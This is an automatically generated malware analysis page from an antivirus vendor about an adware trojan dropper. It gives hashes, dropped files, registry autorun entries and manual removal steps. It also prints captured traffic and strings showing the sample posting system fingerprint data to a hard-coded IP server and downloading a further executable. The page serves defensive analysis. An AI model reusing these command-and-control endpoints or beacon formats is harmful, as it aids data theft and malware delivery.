Dropped.Trojan.GenericKD.3249083_4f12f94555

by malwarelabrobot on May 31st, 2017 in Malware Descriptions.

Gen:Variant.Zusy.205918 (BitDefender), Program:Win32/Hadsruda!bit (Microsoft), not-a-virus:HEUR:AdWare.MSIL.Dotdo.gen (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Adware.Dotdo.78 (DrWeb), Gen:Variant.Zusy.205918 (B) (Emsisoft), Artemis!4F12F945559D (McAfee), Trojan.Gen.2 (Symantec), AdWare.MSIL.Dotdo (Ikarus), Gen:Variant.Zusy.205918 (FSecure), Downloader.AUHZ (AVG), Win32:Adware-gen [Adw] (Avast), TROJ_GE.4BE09BB1 (TrendMicro), Dropped:Trojan.GenericKD.3249083 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4f12f945559d2f133e7e08b819e44e7d
SHA1: be2a7eb524eac1c01e60f151bced67c7bb43c4bf
SHA256: 15eb094101de352525ad5770eebf39da1bfd005bb0c5383fd245de616b0dad0a
SSDeep: 3072:GgXdZt9P6D3XJXC47nXemItOdoewR3kHhhDfrsHXTXQhQDC:Ge3404jOmCOdVwsxfrsHXTAhF
Size: 152842 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Dropped creates the following process(es):

ns5590.tmp:2176
%original file name%.exe:1900
ddnow.exe:2996
ddnow.exe:3060
tinstall.exe:2692
setupone.exe:3488

The Dropped injects its code into the following process(es):

applica.exe:3072

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ns5590.tmp:2176 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\uid.exe (12 bytes)

The process %original file name%.exe:1900 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\uid.exe (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\uid4.exe (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\ns5590.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)

The Dropped deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\uid.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\13904298.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\uid4.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss53BA.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\ns5590.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\icka13904298.txt (0 bytes)

The process ddnow.exe:2996 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)

The process ddnow.exe:3060 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\setupone.exe (61 bytes)

The process tinstall.exe:2692 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)

The process setupone.exe:3488 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)

The Dropped deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss7EB0.tmp (0 bytes)

Registry activity

The process ddnow.exe:2996 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"ConsoleTracingMask" = "4294901760"

The process tinstall.exe:2692 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

The process setupone.exe:3488 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"DisplayName" = "Applica"

"Publisher" = "Dotdo"

[HKLM\SOFTWARE\idot]
"idot" = "ok"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"UninstallString" = "%Program Files%\Applica\uninstall.exe"

To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"

Dropped PE files

MD5 File path
b528db49e0768a9591d6ef902b67416a c:\Program Files\applica\applica.exe
fe1e3670cdc51a0ad694683c98a8c22c c:\Program Files\applica\uninstall.exe
d38543fc9ae37d188a23e06ee11d3504 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\SimpleFC.dll
acc2b699edfea5bf5aae45aba3a41e96 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\nsExec.dll
bca4a017c0a71d525582d054f8902012 c:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe
c4f718889ff1ecadd19f83aae8298977 c:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe
008afd62201f96d10b0b748e2779274d c:\Users\"%CurrentUserName%"\AppData\Local\setupone.exe
b35a0f0aa087c473bdfc575f51a05d24 c:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe
d3b2a92e9d0320d7159c32cbfa867f42 c:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 86016 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 278528 2536 2560 3.13622 b9f20defc9dd650d8dcc7fc5d4708ad4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 124
7bcde813c50a0b0e20e5f9f233bc3040
d8b2e09ac3e5478aeb7d9e0f27cbf4e1
e0ae45173f5a935422c0ce405a61afc8
160abb5aadc8f4c5ea3eb6cd53f48621
b2c2fe845b7047573fd3b5d20d966966
62c0e04ad607b9e9818d35189357bbd6
7453706033c86c24b16f3b83f4f6840d
976e7b3d6bb262cb6426a5f1ea916cba
f6aff0b9b146929b2c655288d5da55ed
688987076a743b6ad9a21cdf72e88aef
096cc8ec1268a7a48f4e8e9acffd275c
868d60bfcfe02d05fecfcb3e44e2ccce
516401f3104d731ca24c600b7ae68d76
a8c97fb33db997aaf9411704474278a1
5bec3c6a9950cf902e71b84dc814c3f9
29de0a3a7170f7dd71267eee2449b462
ca004345bdd1cb292744ed711de04d19
2a9af6bcab5eb49d9a62a6ea72cdd286
e4e8ea421895b321bea9afa16d8a6fb5
851b5de8d1e586ba0301b1027800dea8
54c304cd37a8ae6ce5c21d5a5240d80c
f4ae937348a591e02f7ccb79f47cdc1f
c27730e88a7e5003ff846e8f0e578968
023529d5b4f5db6fc3e123bf47ac15d6
8e38be8c510a94c0a96ee39bc32ed333

URLs

URL IP
hxxp://162.222.194.89/soid1.php?p=&aaaip=359524
hxxp://162.222.194.89/goet1.php?p=&pid=&all=&dotnet=yes
hxxp://162.222.194.89/setup200.exe
hxxp://162.222.194.89/newc4nT.php
d.rightmate.xyz


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




OK

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:23:08 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




OK

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:54 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




OK

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:44 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /goet1.php?p=&pid=&all=&dotnet=yes HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 285
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




;5wpy5gv2664;0-$fire-AT$bgot--L$cgot-c:\4f12f945559d2f133e7e08b819e44e
7d.exe;a=00:50:56:38:44:C4&b=E2BF-F706-5D8D-98F7-43A2-79C5-C253-60F9&c
=Intel CorporationBase BoardNone&d=VMware, VMware Virtual S SCSI Disk 
Device(Standard disk drives)1720565255&e=00426-OEM-8992662-00010&f=- A
V -..

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:21 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /soid1.php?p=&aaaip=359524 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




aa

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:19 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 10
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
...1111111..



POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




OK

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:39 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




OK

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:35 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




OK

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:23:03 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




OK

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:58 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




OK

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:30 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /setup200.exe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




;

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:25 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Description: File Transfer
Content-Disposition: attachment; filename=
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 61844
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@..@.data...X\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@
..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u
....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..
Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




OK

HTTP/1.1 200 OK


Date: Mon, 29 May 2017 23:22:49 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html







The Dropped connects to the servers at the folowing location(s):







%original file name%.exe_1900:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.194.89/newc4nT.php" "OK" "icka13904298.txt"
5wpy5gv2664;0-$fire-AT$bgot--L$cgot-c:\%original file name%.exe;a=00:50:56:38:44:C4&b=E2BF-F706-5D8D-98F7-43A2-79C5-C253-60F9&c=Intel CorporationBase BoardNone&d=VMware, VMware Virtual S SCSI Disk Device(Standard disk drives)1720565255&e=00426-OEM-8992662-00010&f=- AV -
" "13904298.txt"
C:\Users\"%CurrentUserName%"\AppData\Local\icka13904298.txt
nsExec.dll
SID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32
ers\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\nsExec.dll
.reloc
SShL0
PeekNamedPipe
CreatePipe
99|9
: :0:5:>:
KWindows
HNetCfg.FwMgr
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
GetCPInfo
gdi32.dll
SimpleFC.dll
AddPort
EnableDisablePort
IsPortAdded
IsPortEnabled
RemovePort
? ?'?6?=?_?
8 8$8(8,808
7%7/767~7
5!5%5)5-51555
hWEB
>6<%<-<7
..bYc
icka13904298.txt
5.ocx
ICKA13~1.TXT
sers\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.194.89/newc4nT.php" "OK" "icka13904298.txt"
\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp
f12f945559d2f133e7e08b819e44e7d.exe
\Windows\system32\Macromed\Flash\Flash32_23_0_0_185.ocx
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nss53BA.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp
a=00:50:56:38:44:C4&b=E2BF-F706-5D8D-98F7-43A2-79C5-C253-60F9&c=Intel CorporationBase BoardNone&d=VMware, VMware Virtual S SCSI Disk Device(Standard disk drives)1720565255&e=00426-OEM-8992662-00010&f=- AV -
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
-Operation f
Eigenschaft %s existiert nicht.
OLE-Fehler %.8xBDie Methode '%s' wird vom Automatisierungsobjekt nicht unterst
ge ($0%x)3Komponente mit der Bezeichnung %s existiert bereits/In der Stringliste sind Duplikate nicht erlaubt#Datei %s kann nicht erstellt werden#Datei %s kann nicht ge
ffnet werden(''%s'' ist kein g
pft (%d)#Zu viele Eintr
ge in der Liste (%d)*Listenindex
berschreitet das Maximum (%d)BExpandieren des Speicher-Stream wegen Speichermangel nicht m
glich Fehler beim Lesen von %s%s%s: %s
%s.Seek nicht implementiert
r '%s' nicht gefunden&%s kann nicht zu %s zugewiesen werden
Klasse %s nicht gefunden
%s (%s, Zeile %d)
Abstrakter FehlerBZugriffsverletzung bei Adresse %p in Modul '%s'. %s von Adresse %p
Systemfehler. Code: %d.
%s:Ein Aufruf einer Betriebssystemfunktion ist fehlgeschlagen
ltige Variant-Operation#Ung
ltige Variant-Operation ($%.8x)
Variant ist kein ArrayBVariante des Typs (%s) konnte nicht in Typ (%s) konvertiert werdenF
berlauf bei der Konvertierung einer Variante vom Typ (%s) in Typ (%s)
ltiger Variant-Typ Operation wird nicht unterst
Externe Exception %x$Auswertung von assert fehlgeschlagen
ltige Zeigeroperation
ltige Typumwandlung4Zugriffsverletzung bei Adresse %p. %s von Adresse %p
Privilegierte Anweisung(Exception %s in Modul %s bei %p.
Anwendungsfehler7Format '%s' ung
r Format '%s'(Variant-Methodenaufruf nicht unterst
"'%s' ist kein g
ltiger Integerwert"'%s' ist kein g
E/A-Fehler %d
ltige Gleitkommaoperation
lash\Flash32_23_0_0_185.ocx






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    ns5590.tmp:2176
    %original file name%.exe:1900
    ddnow.exe:2996
    ddnow.exe:3060
    tinstall.exe:2692
    setupone.exe:3488
    

    2. 

  2. Delete the original Dropped file.
    3. 

  3. Delete or disinfect the following files created/modified by the Dropped:
    

    C:\Users\"%CurrentUserName%"\AppData\Local\uid.exe (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\SimpleFC.dll (5469 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\nsExec.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\uid4.exe (9 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\ns5590.tmp (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\setupone.exe (61 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
    %Program Files%\applica\applica.exe (12 bytes)
    %Program Files%\applica\key.ini (0 bytes)
    %Program Files%\applica\uninstall.exe (1030 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Applica" = "%Program Files%\applica\applica.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Applica" = "%Program Files%\applica\applica.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2025 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now